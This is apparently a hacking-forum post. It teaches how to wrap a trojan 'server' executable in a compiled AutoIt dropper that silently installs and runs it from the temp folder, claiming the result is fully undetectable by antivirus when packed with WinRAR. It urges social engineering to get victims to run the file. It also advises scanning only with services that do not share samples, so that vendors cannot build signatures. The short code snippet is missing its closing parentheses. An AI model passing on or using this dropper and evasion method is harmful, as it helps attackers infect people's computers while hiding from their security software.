This method when used with winrar created a COMPLETELY FUD executable. Without the RAR its nearly FUD. This is a method I have used for a while now. With some good social engineering you can do some pwnage stuff using it. Hope you all enjoy it as it's the first major thing I feel I have shared with the community. I will try to make this kind of stuff more of an effort =]
A downside is that it causes your server to get a bit larger. (about 200kb).
But it is a nice alternative.
First off, you will need AutoIt. Download it from:
Now once you have it downloaded and installed right click your desktop. Click New>Autoit v3 Script.
Now, in the script put the following code:

FileInstall("server.exe", @TempDir&"/server.exe"
Run(@TempDir&"/server.exe"
Now be sure your server is named server.exe.
Go to start > programs > autoit > compile script to .exe
Select highest compression. Compile the script. Enjoy.
If you know some autoit I am sure you can work to make this more FUD without having to use winrar.
Now, i recommend using the Virus.org scanner as it will not distribute your files. Although, as of now, this method is FUD. So I scanned mine on VT ONLY after I password protected it. The AV vendors will only have access to the offsets, and as there were none they cannot do much with my file since its password protected.
